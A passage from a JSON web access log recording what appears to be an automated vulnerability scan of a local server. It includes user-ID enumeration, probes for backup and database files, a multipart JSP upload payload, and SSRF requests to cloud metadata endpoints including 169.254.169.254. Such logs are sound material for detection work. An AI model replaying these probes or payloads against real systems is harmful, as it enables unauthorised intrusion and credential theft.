Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/40 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/41 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/42 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/29KBxgMWQcXiMdaqxLz9Q5QkB6T.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.069","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.077","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.057","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"7.189","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"8.358","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"7.291","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/55 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/56 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.072","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.076","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/57 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/58 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/59 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/61 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/62 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/63 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/65 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/66 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/67 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/69 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/70 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/71 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/72 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/73 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.089","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.086","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz 